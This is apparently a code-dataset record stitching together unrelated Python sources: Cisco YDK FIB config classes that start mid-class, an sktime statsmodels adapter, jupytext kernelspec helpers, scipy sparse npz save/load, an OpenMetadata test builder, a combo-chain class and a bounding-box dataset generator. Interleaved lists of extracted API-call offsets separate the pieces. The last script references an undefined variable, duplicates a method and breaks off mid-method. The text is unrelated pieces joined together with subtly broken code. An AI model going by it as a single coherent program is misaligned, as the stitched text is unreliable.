self._child_classes = OrderedDict([("pbts-forward-class-fallback", ("pbts_forward_class_fallback", Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback))])
self._leafs = OrderedDict()
self.pbts_forward_class_fallback = YList(self)
self._segment_path = lambda: "pbts-forward-class-fallbacks"
self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Fib.PbtsForwardClassFallbacks, [], name, value)
class PbtsForwardClassFallback(Entity):
"""
Set PBTS class for fallback
.. attribute:: forward_class_number (key)
PBTS forward class number
**type**\: union of the below types:
**type**\: :py:class:`FibPbtsForwardClass <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.FibPbtsForwardClass>`
**type**\: int
**range:** 0..8
.. attribute:: fallback_type
Set PBTS fallback type
**type**\: :py:class:`FibPbtsFallback <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.FibPbtsFallback>`
**mandatory**\: True
.. attribute:: fallback_class_number_array
Set PBTS fallback class number array
**type**\: list of int
**range:** 0..7
"""
_prefix = 'fib-common-cfg'
_revision = '2017-05-01'
def __init__(self):
super(Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback, self).__init__()
self.yang_name = "pbts-forward-class-fallback"
self.yang_parent_name = "pbts-forward-class-fallbacks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['forward_class_number']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('forward_class_number', (YLeaf(YType.str, 'forward-class-number'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg', 'FibPbtsForwardClass', ''),'int'])),
('fallback_type', (YLeaf(YType.enumeration, 'fallback-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg', 'FibPbtsFallback', '')])),
('fallback_class_number_array', (YLeafList(YType.uint32, 'fallback-class-number-array'), ['int'])),
])
self.forward_class_number = None
self.fallback_type = None
self.fallback_class_number_array = []
self._segment_path = lambda: "pbts-forward-class-fallback" + "[forward-class-number='" + str(self.forward_class_number) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/pbts-forward-class-fallbacks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback, ['forward_class_number', 'fallback_type', 'fallback_class_number_array'], name, value)
class Platform(Entity):
"""
FIB platform parameters
.. attribute:: label_switched_multicast
Options for label\-switched\-multicast parameters
**type**\: :py:class:`LabelSwitchedMulticast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.Platform.LabelSwitchedMulticast>`
"""
_prefix = 'fib-common-cfg'
_revision = '2017-05-01'
def __init__(self):
super(Fib.Platform, self).__init__()
self.yang_name = "platform"
self.yang_parent_name = "fib"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("label-switched-multicast", ("label_switched_multicast", Fib.Platform.LabelSwitchedMulticast))])
self._leafs = OrderedDict()
self.label_switched_multicast = Fib.Platform.LabelSwitchedMulticast()
self.label_switched_multicast.parent = self
self._children_name_map["label_switched_multicast"] = "label-switched-multicast"
self._segment_path = lambda: "platform"
self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Fib.Platform, [], name, value)
class LabelSwitchedMulticast(Entity):
"""
Options for label\-switched\-multicast parameters
.. attribute:: frr_holdtime
Set time to keep FRR slots programmed post FRR
**type**\: int
**range:** 3..180
**units**\: second
"""
_prefix = 'fib-common-cfg'
_revision = '2017-05-01'
def __init__(self):
super(Fib.Platform.LabelSwitchedMulticast, self).__init__()
self.yang_name = "label-switched-multicast"
self.yang_parent_name = "platform"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('frr_holdtime', (YLeaf(YType.uint32, 'frr-holdtime'), ['int'])),
])
self.frr_holdtime = None
self._segment_path = lambda: "label-switched-multicast"
self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/platform/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Fib.Platform.LabelSwitchedMulticast, ['frr_holdtime'], name, value)
def clone_ptr(self):
self._top_entity = Fib()
return self._top_entity
| [
"collections.OrderedDict",
"ydk.types.YLeafList",
"ydk.types.YLeaf",
"ydk.types.YList",
"ydk.types.Enum.YLeaf"
] | [((906, 927), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(1)', '"""list"""'], {}), "(1, 'list')\n", (916, 927), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((939, 959), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(2)', '"""any"""'], {}), "(2, 'any')\n", (949, 959), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((972, 993), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(3)', '"""drop"""'], {}), "(3, 'drop')\n", (982, 993), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((1161, 1181), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(8)', '"""any"""'], {}), "(8, 'any')\n", (1171, 1181), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((2597, 2761), 'collections.OrderedDict', 'OrderedDict', (["[('pbts-forward-class-fallbacks', ('pbts_forward_class_fallbacks', Fib.\n PbtsForwardClassFallbacks)), ('platform', ('platform', Fib.Platform))]"], {}), "([('pbts-forward-class-fallbacks', (\n 'pbts_forward_class_fallbacks', Fib.PbtsForwardClassFallbacks)), (\n 'platform', ('platform', Fib.Platform))])\n", (2608, 2761), False, 'from collections import OrderedDict\n'), ((4804, 4943), 'collections.OrderedDict', 'OrderedDict', (["[('pbts-forward-class-fallback', ('pbts_forward_class_fallback', Fib.\n PbtsForwardClassFallbacks.PbtsForwardClassFallback))]"], {}), "([('pbts-forward-class-fallback', ('pbts_forward_class_fallback',\n Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback))])\n", (4815, 4943), False, 'from collections import OrderedDict\n'), ((4966, 4979), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (4977, 4979), False, 'from collections import OrderedDict\n'), ((5028, 5039), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (5033, 5039), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((8949, 9064), 'collections.OrderedDict', 'OrderedDict', (["[('label-switched-multicast', ('label_switched_multicast', Fib.Platform.\n LabelSwitchedMulticast))]"], {}), "([('label-switched-multicast', ('label_switched_multicast', Fib.\n Platform.LabelSwitchedMulticast))])\n", (8960, 9064), False, 'from collections import OrderedDict\n'), ((9086, 9099), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (9097, 9099), False, 'from collections import OrderedDict\n'), ((6945, 6960), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (6956, 6960), False, 'from collections import OrderedDict\n'), ((10516, 10531), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (10527, 10531), False, 'from collections import OrderedDict\n'), ((2823, 2864), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""auto-hash-recover"""'], {}), "(YType.boolean, 'auto-hash-recover')\n", (2828, 2864), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((2913, 2954), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""prefer-aib-routes"""'], {}), "(YType.boolean, 'prefer-aib-routes')\n", (2918, 2954), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((3007, 3052), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""encap-sharing-disable"""'], {}), "(YType.boolean, 'encap-sharing-disable')\n", (3012, 3052), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((3102, 3144), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""frr-follow-bgp-pic"""'], {}), "(YType.boolean, 'frr-follow-bgp-pic')\n", (3107, 3144), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((7051, 7091), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""forward-class-number"""'], {}), "(YType.str, 'forward-class-number')\n", (7056, 7091), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((7226, 7267), 'ydk.types.YLeaf', 'YLeaf', (['YType.enumeration', '"""fallback-type"""'], {}), "(YType.enumeration, 'fallback-type')\n", (7231, 7267), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((7406, 7460), 'ydk.types.YLeafList', 'YLeafList', (['YType.uint32', '"""fallback-class-number-array"""'], {}), "(YType.uint32, 'fallback-class-number-array')\n", (7415, 7460), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((10614, 10649), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""frr-holdtime"""'], {}), "(YType.uint32, 'frr-holdtime')\n", (10619, 10649), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n')] |
"""Series of actions that form a combo chain"""
from __future__ import annotations
from typing import Optional, Sequence, TYPE_CHECKING
from action import Action
from core.utility import Array
from core.constants import PlayerForm, SimActKind, MomentType
from core.database import FromDB
if TYPE_CHECKING:
from entity.player import Player
class Combos:
def __init__(self, player: Player, form: PlayerForm, act_ids: Sequence[int], ex_act_ids: Optional[Sequence[int]] = None) -> None:
self.player = player
self.actions: Array[Action] = Array()
for idx, act_id in enumerate(act_ids):
self.actions.append(Action(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1))
self.ex_actions = None
if ex_act_ids:
self.ex_actions: Array[Action] = Array()
for idx, act_id in enumerate(ex_act_ids):
if not act_id:
self.ex_actions.append(None)
continue
self.ex_actions.append(Action(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1))
def next(self):
if self.player.current in self.actions:
try:
return self.actions[self.player.current.index + 1]
except IndexError:
pass
return self.actions[1]
def __repr__(self) -> str:
if self.ex_actions:
return "->".join(map(repr, self.actions)) + "\tEX[" + "->".join(map(repr, self.ex_actions)) + "]"
return "->".join(map(repr, self.actions))
class UniqueCombos(Combos, FromDB, table="CharaUniqueCombo"):
def __init__(self, id: int, player: Player) -> None:
FromDB.__init__(self, id)
act_ids = (self._data["_ActionId"] + i for i in range(self._data["_MaxComboNum"]))
ex_act_ids = None if not self._data["_ExActionId"] else (self._data["_ExActionId"] + i for i in range(self._data["_MaxComboNum"]))
Combos.__init__(self, player, PlayerForm.ADV, act_ids, ex_act_ids=ex_act_ids)
if self._data["_ShiftConditionType"] == 1:
self.player.events.listen(MomentType.HIT, self.enable)
def enable(self, *args, **kwargs):
pass
class DefaultCombos(Combos, FromDB, table="WeaponType"):
def __init__(self, id: int, player: Player) -> None:
FromDB.__init__(self, id)
act_ids = (self._data[f"_DefaultSkill{i+1:02}"] for i in range(5) if self._data[f"_DefaultSkill{i+1:02}"])
ex_act_ids = None if not self._data["_DefaultSkill05Ex"] else (0, 0, 0, 0, self._data["_DefaultSkill05Ex"])
Combos.__init__(self, player, PlayerForm.ADV, act_ids, ex_act_ids=ex_act_ids)
class DragonCombos(Combos):
def __init__(self, id: int, combo_max: int, player: Player) -> None:
act_ids = (id + i for i in range(combo_max))
Combos.__init__(self, player, PlayerForm.DRG, act_ids)
| [
"core.utility.Array",
"action.Action",
"core.database.FromDB.__init__"
] | [((562, 569), 'core.utility.Array', 'Array', ([], {}), '()\n', (567, 569), False, 'from core.utility import Array\n'), ((1689, 1714), 'core.database.FromDB.__init__', 'FromDB.__init__', (['self', 'id'], {}), '(self, id)\n', (1704, 1714), False, 'from core.database import FromDB\n'), ((2326, 2351), 'core.database.FromDB.__init__', 'FromDB.__init__', (['self', 'id'], {}), '(self, id)\n', (2341, 2351), False, 'from core.database import FromDB\n'), ((821, 828), 'core.utility.Array', 'Array', ([], {}), '()\n', (826, 828), False, 'from core.utility import Array\n'), ((649, 720), 'action.Action', 'Action', (['act_id', 'player'], {'kind': 'SimActKind.COMBO', 'form': 'form', 'index': '(idx + 1)'}), '(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)\n', (655, 720), False, 'from action import Action\n'), ((1031, 1102), 'action.Action', 'Action', (['act_id', 'player'], {'kind': 'SimActKind.COMBO', 'form': 'form', 'index': '(idx + 1)'}), '(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)\n', (1037, 1102), False, 'from action import Action\n')] |
#!/usr/bin/env python3 -u
# -*- coding: utf-8 -*-
__author__ = ["<NAME>"]
__all__ = ["_StatsModelsAdapter"]
import numpy as np
import pandas as pd
from sktime.forecasting.base._base import DEFAULT_ALPHA
from sktime.forecasting.base._sktime import _OptionalForecastingHorizonMixin
from sktime.forecasting.base._sktime import _SktimeForecaster
class _StatsModelsAdapter(_OptionalForecastingHorizonMixin, _SktimeForecaster):
"""Base class for interfacing statsmodels forecasting algorithms"""
_fitted_param_names = ()
def __init__(self):
self._forecaster = None
self._fitted_forecaster = None
super(_StatsModelsAdapter, self).__init__()
def fit(self, y, X=None, fh=None):
"""Fit to training data.
Parameters
----------
y : pd.Series
Target time series to which to fit the forecaster.
fh : int, list or np.array, optional (default=None)
The forecasters horizon with the steps ahead to to predict.
X : pd.DataFrame, optional (default=None)
Exogenous variables are ignored
Returns
-------
self : returns an instance of self.
"""
# statsmodels does not support the pd.Int64Index as required,
# so we coerce them here to pd.RangeIndex
if isinstance(y, pd.Series) and type(y.index) == pd.Int64Index:
y, X = _coerce_int_to_range_index(y, X)
self._set_y_X(y, X)
self._set_fh(fh)
self._fit_forecaster(y, X)
self._is_fitted = True
return self
def _fit_forecaster(self, y_train, X_train=None):
"""Internal fit"""
raise NotImplementedError("abstract method")
def _predict(self, fh, X=None, return_pred_int=False, alpha=DEFAULT_ALPHA):
"""
Make forecasts.
Parameters
----------
fh : ForecastingHorizon
The forecasters horizon with the steps ahead to to predict.
Default is one-step ahead forecast,
i.e. np.array([1])
X : pd.DataFrame, optional (default=None)
Exogenous variables are ignored.
return_pred_int : bool, optional (default=False)
alpha : int or list, optional (default=0.95)
Returns
-------
y_pred : pd.Series
Returns series of predicted values.
"""
if return_pred_int:
raise NotImplementedError()
# statsmodels requires zero-based indexing starting at the
# beginning of the training series when passing integers
start, end = fh.to_absolute_int(self._y.index[0], self.cutoff)[[0, -1]]
y_pred = self._fitted_forecaster.predict(start, end)
# statsmodels forecasts all periods from start to end of forecasting
# horizon, but only return given time points in forecasting horizon
return y_pred.loc[fh.to_absolute(self.cutoff).to_pandas()]
def get_fitted_params(self):
"""Get fitted parameters
Returns
-------
fitted_params : dict
"""
self.check_is_fitted()
return {
name: self._fitted_forecaster.params.get(name)
for name in self._get_fitted_param_names()
}
def _get_fitted_param_names(self):
"""Get names of fitted parameters"""
return self._fitted_param_names
def _coerce_int_to_range_index(y, X=None):
new_index = pd.RangeIndex(y.index[0], y.index[-1] + 1)
try:
np.testing.assert_array_equal(y.index, new_index)
except AssertionError:
raise ValueError(
"Coercion of pd.Int64Index to pd.RangeIndex "
"failed. Please provide `y_train` with a "
"pd.RangeIndex."
)
y.index = new_index
if X is not None:
X.index = new_index
return y, X
| [
"numpy.testing.assert_array_equal",
"pandas.RangeIndex"
] | [((3433, 3475), 'pandas.RangeIndex', 'pd.RangeIndex', (['y.index[0]', '(y.index[-1] + 1)'], {}), '(y.index[0], y.index[-1] + 1)\n', (3446, 3475), True, 'import pandas as pd\n'), ((3493, 3542), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['y.index', 'new_index'], {}), '(y.index, new_index)\n', (3522, 3542), True, 'import numpy as np\n')] |
"""Find kernel specifications for a given language"""
import os
import sys
from .languages import same_language
from .reraise import reraise
try:
# I prefer not to take a dependency on jupyter_client
from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec
except ImportError as err:
find_kernel_specs = reraise(err)
get_kernel_spec = reraise(err)
def set_kernelspec_from_language(notebook):
"""Set the kernel specification based on the 'main_language' metadata"""
language = notebook.metadata.get("jupytext", {}).get("main_language")
if "kernelspec" not in notebook.metadata and language:
try:
kernelspec = kernelspec_from_language(language)
except ValueError:
return
notebook.metadata["kernelspec"] = kernelspec
notebook.metadata.get("jupytext", {}).pop("main_language")
def kernelspec_from_language(language):
"""Return the python kernel that matches the current env, or the first kernel that matches the given language"""
if language == "python":
# Return the kernel that matches the current Python executable
for name in find_kernel_specs():
kernel_specs = get_kernel_spec(name)
cmd = kernel_specs.argv[0]
if (
kernel_specs.language == "python"
and os.path.isfile(cmd)
and os.path.samefile(cmd, sys.executable)
):
return {
"name": name,
"language": language,
"display_name": kernel_specs.display_name,
}
raise ValueError(
"No kernel found that matches the current python executable {}\n".format(
sys.executable
)
+ "Install one with 'python -m ipykernel install --name kernel_name [--user]'"
)
for name in find_kernel_specs():
kernel_specs = get_kernel_spec(name)
if same_language(kernel_specs.language, language):
return {
"name": name,
"language": language,
"display_name": kernel_specs.display_name,
}
raise ValueError("No kernel found for the language {}".format(language))
| [
"jupyter_client.kernelspec.find_kernel_specs",
"jupyter_client.kernelspec.get_kernel_spec",
"os.path.samefile",
"os.path.isfile"
] | [((1903, 1922), 'jupyter_client.kernelspec.find_kernel_specs', 'find_kernel_specs', ([], {}), '()\n', (1920, 1922), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1157, 1176), 'jupyter_client.kernelspec.find_kernel_specs', 'find_kernel_specs', ([], {}), '()\n', (1174, 1176), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1947, 1968), 'jupyter_client.kernelspec.get_kernel_spec', 'get_kernel_spec', (['name'], {}), '(name)\n', (1962, 1968), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1205, 1226), 'jupyter_client.kernelspec.get_kernel_spec', 'get_kernel_spec', (['name'], {}), '(name)\n', (1220, 1226), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1353, 1372), 'os.path.isfile', 'os.path.isfile', (['cmd'], {}), '(cmd)\n', (1367, 1372), False, 'import os\n'), ((1393, 1430), 'os.path.samefile', 'os.path.samefile', (['cmd', 'sys.executable'], {}), '(cmd, sys.executable)\n', (1409, 1430), False, 'import os\n')] |
import numpy as np
import scipy.sparse
__all__ = ['save_npz', 'load_npz']
# Make loading safe vs. malicious input
PICKLE_KWARGS = dict(allow_pickle=False)
def save_npz(file, matrix, compressed=True):
""" Save a sparse matrix to a file using ``.npz`` format.
Parameters
----------
file : str or file-like object
Either the file name (string) or an open file (file-like object)
where the data will be saved. If file is a string, the ``.npz``
extension will be appended to the file name if it is not already
there.
matrix: spmatrix (format: ``csc``, ``csr``, ``bsr``, ``dia`` or coo``)
The sparse matrix to save.
compressed : bool, optional
Allow compressing the file. Default: True
See Also
--------
scipy.sparse.load_npz: Load a sparse matrix from a file using ``.npz`` format.
numpy.savez: Save several arrays into a ``.npz`` archive.
numpy.savez_compressed : Save several arrays into a compressed ``.npz`` archive.
Examples
--------
Store sparse matrix to disk, and load it again:
>>> import scipy.sparse
>>> sparse_matrix = scipy.sparse.csc_matrix(np.array([[0, 0, 3], [4, 0, 0]]))
>>> sparse_matrix
<2x3 sparse matrix of type '<class 'numpy.int64'>'
with 2 stored elements in Compressed Sparse Column format>
>>> sparse_matrix.todense()
matrix([[0, 0, 3],
[4, 0, 0]], dtype=int64)
>>> scipy.sparse.save_npz('/tmp/sparse_matrix.npz', sparse_matrix)
>>> sparse_matrix = scipy.sparse.load_npz('/tmp/sparse_matrix.npz')
>>> sparse_matrix
<2x3 sparse matrix of type '<class 'numpy.int64'>'
with 2 stored elements in Compressed Sparse Column format>
>>> sparse_matrix.todense()
matrix([[0, 0, 3],
[4, 0, 0]], dtype=int64)
"""
arrays_dict = {}
if matrix.format in ('csc', 'csr', 'bsr'):
arrays_dict.update(indices=matrix.indices, indptr=matrix.indptr)
elif matrix.format == 'dia':
arrays_dict.update(offsets=matrix.offsets)
elif matrix.format == 'coo':
arrays_dict.update(row=matrix.row, col=matrix.col)
else:
raise NotImplementedError('Save is not implemented for sparse matrix of format {}.'.format(matrix.format))
arrays_dict.update(
format=matrix.format.encode('ascii'),
shape=matrix.shape,
data=matrix.data
)
if compressed:
np.savez_compressed(file, **arrays_dict)
else:
np.savez(file, **arrays_dict)
def load_npz(file):
""" Load a sparse matrix from a file using ``.npz`` format.
Parameters
----------
file : str or file-like object
Either the file name (string) or an open file (file-like object)
where the data will be loaded.
Returns
-------
result : csc_matrix, csr_matrix, bsr_matrix, dia_matrix or coo_matrix
A sparse matrix containing the loaded data.
Raises
------
OSError
If the input file does not exist or cannot be read.
See Also
--------
scipy.sparse.save_npz: Save a sparse matrix to a file using ``.npz`` format.
numpy.load: Load several arrays from a ``.npz`` archive.
Examples
--------
Store sparse matrix to disk, and load it again:
>>> import scipy.sparse
>>> sparse_matrix = scipy.sparse.csc_matrix(np.array([[0, 0, 3], [4, 0, 0]]))
>>> sparse_matrix
<2x3 sparse matrix of type '<class 'numpy.int64'>'
with 2 stored elements in Compressed Sparse Column format>
>>> sparse_matrix.todense()
matrix([[0, 0, 3],
[4, 0, 0]], dtype=int64)
>>> scipy.sparse.save_npz('/tmp/sparse_matrix.npz', sparse_matrix)
>>> sparse_matrix = scipy.sparse.load_npz('/tmp/sparse_matrix.npz')
>>> sparse_matrix
<2x3 sparse matrix of type '<class 'numpy.int64'>'
with 2 stored elements in Compressed Sparse Column format>
>>> sparse_matrix.todense()
matrix([[0, 0, 3],
[4, 0, 0]], dtype=int64)
"""
with np.load(file, **PICKLE_KWARGS) as loaded:
try:
matrix_format = loaded['format']
except KeyError as e:
raise ValueError('The file {} does not contain a sparse matrix.'.format(file)) from e
matrix_format = matrix_format.item()
if not isinstance(matrix_format, str):
# Play safe with Python 2 vs 3 backward compatibility;
# files saved with SciPy < 1.0.0 may contain unicode or bytes.
matrix_format = matrix_format.decode('ascii')
try:
cls = getattr(scipy.sparse, '{}_matrix'.format(matrix_format))
except AttributeError as e:
raise ValueError('Unknown matrix format "{}"'.format(matrix_format)) from e
if matrix_format in ('csc', 'csr', 'bsr'):
return cls((loaded['data'], loaded['indices'], loaded['indptr']), shape=loaded['shape'])
elif matrix_format == 'dia':
return cls((loaded['data'], loaded['offsets']), shape=loaded['shape'])
elif matrix_format == 'coo':
return cls((loaded['data'], (loaded['row'], loaded['col'])), shape=loaded['shape'])
else:
raise NotImplementedError('Load is not implemented for '
'sparse matrix of format {}.'.format(matrix_format))
| [
"numpy.savez_compressed",
"numpy.load",
"numpy.savez"
] | [((2426, 2466), 'numpy.savez_compressed', 'np.savez_compressed', (['file'], {}), '(file, **arrays_dict)\n', (2445, 2466), True, 'import numpy as np\n'), ((2485, 2514), 'numpy.savez', 'np.savez', (['file'], {}), '(file, **arrays_dict)\n', (2493, 2514), True, 'import numpy as np\n'), ((4018, 4048), 'numpy.load', 'np.load', (['file'], {}), '(file, **PICKLE_KWARGS)\n', (4025, 4048), True, 'import numpy as np\n')] |
# Copyright 2022 Collate
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
TestCase builder
"""
from metadata.generated.schema.api.tests.createTableTest import CreateTableTestRequest
from metadata.generated.schema.tests.table import tableRowCountToEqual
from metadata.generated.schema.tests.tableTest import TableTestType
from metadata.great_expectations.builders.table.base_table_test_builders import (
BaseTableTestBuilder,
)
class TableRowCountToEqualBuilder(BaseTableTestBuilder):
"""Builder for `expect_table_row_count_to_equal` GE expectation"""
def _build_test(self) -> CreateTableTestRequest:
"""Specific test builder for the test"""
return self.build_test_request(
config=tableRowCountToEqual.TableRowCountToEqual(
value=self.result["expectation_config"]["kwargs"]["value"],
),
test_type=TableTestType.tableRowCountToEqual,
)
| [
"metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual"
] | [((1225, 1331), 'metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual', 'tableRowCountToEqual.TableRowCountToEqual', ([], {'value': "self.result['expectation_config']['kwargs']['value']"}), "(value=self.result[\n 'expectation_config']['kwargs']['value'])\n", (1266, 1331), False, 'from metadata.generated.schema.tests.table import tableRowCountToEqual\n')] |
'''
This code is based on https://github.com/jrieke/shape-detection/
'''
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
import tensorflow as tf
import datetime
class JriekeBboxDataset:
def generate(self):
print('Generating...')
self.WIDTH = 8
self.HEIGHT = 8
num_imgs = 50000
min_object_size = 1
max_object_size = 4
num_objects = 1
self.bboxes = np.zeros((num_imgs, num_objects, 4))
self.imgs = np.zeros((num_imgs, self.WIDTH, self.HEIGHT)) # set background to 0
for i_img in range(num_imgs):
for i_object in range(num_objects):
w, h = np.random.randint(min_object_size, max_object_size, size=2)
x = np.random.randint(0, self.WIDTH - w)
y = np.random.randint(0, self.HEIGHT - h)
self.imgs[i_img, y:y+h, x:x+w] = 1. # set rectangle to 1
self.bboxes[i_img, i_object] = [x, y, w, h]
print("Shapes: imgs ", self.imgs.shape, " bboxes ", self.bboxes.shape)
#why this?
# X = (self.imgs.reshape(num_imgs, -1) - np.mean(self.imgs)) / np.std(self.imgs)
X = self.imgs
y = self.bboxes.reshape(num_imgs, -1) / self.WIDTH
# Split training and test.
i = int(0.8 * num_imgs)
train_X = X[:i] #80% for training
test_X = X[i:]
train_y = y[:i]
test_y = y[i:]
self.test_imgs = self.imgs[i:]
self.test_bboxes = self.bboxes[i:]
return train_X, train_y, test_X, test_y
def check_dataset_image_compability(self, test_X_sample, test_imgs_sample):
fig = plt.figure(figsize=(12, 3))
fig.suptitle('check if the generated imgs match to the test_X slice image')
fig.subplots_adjust(top=0.85)
plt.subplot(1, 2, 1)
plt.gca().set_title('Returned by the dataset class: used for training')
plt.imshow(test_X_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
plt.subplot(1, 2, 2)
plt.gca().set_title('Global image holder: used for plotting.')
plt.imshow(test_imgs_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
plt.show()
print('compare:',TMP,test_imgs_sample)
def IOU(self,bbox1, bbox2):
'''Calculate overlap between two bounding boxes [x, y, w, h] as the area of intersection over the area of unity'''
x1, y1, w1, h1 = bbox1[0], bbox1[1], bbox1[2], bbox1[3]
x2, y2, w2, h2 = bbox2[0], bbox2[1], bbox2[2], bbox2[3]
w_I = min(x1 + w1, x2 + w2) - max(x1, x2)
h_I = min(y1 + h1, y2 + h2) - max(y1, y2)
if w_I <= 0 or h_I <= 0: # no overlap
return 0.
I = w_I * h_I
U = w1 * h1 + w2 * h2 - I
return I / U
def convertDefaultAnnotToCoord(self, annot):
'''
annot -> [x, y, w, h]
'''
w = annot[2] * self.WIDTH
h = annot[3] * self.HEIGHT
x = annot[0] * self.HEIGHT
y = annot[1] * self.HEIGHT
return [x,y,w,h]
def convertYoloAnnotToCoord(self, yolo_annot):
'''
yolo_annot -> [x, y, w, h]
'''
w = yolo_annot[2] * self.WIDTH
h = yolo_annot[3] * self.HEIGHT
x = (yolo_annot[0] * self.WIDTH) - (w/2)
y = (yolo_annot[1] * self.HEIGHT) - (h/2)
return [x,y,w,h]
def show_generated(self, i=0):
fig = plt.figure()
fig.subplots_adjust(top=0.85)
fig.suptitle('Generated image sample + GT')
plt.imshow(self.imgs[i], cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
for bbox in self.bboxes[i]:
plt.gca().add_patch(matplotlib.patches.Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r', fc='none'))
plt.gca().legend(['GT'])
plt.show()
def plot_rectangle(self, img, bbox):
fig = plt.figure()
fig.suptitle('Plotting rectangle.')
fig.subplots_adjust(top=0.85)
plt.subplot(1, 1, 1)
plt.imshow(img, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
plt.gca().add_patch(matplotlib.patches.Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r', fc='none'))
plt.show()
def check_dataset_image_compability(self, test_X_sample, test_imgs_sample):
fig = plt.figure(figsize=(12, 3))
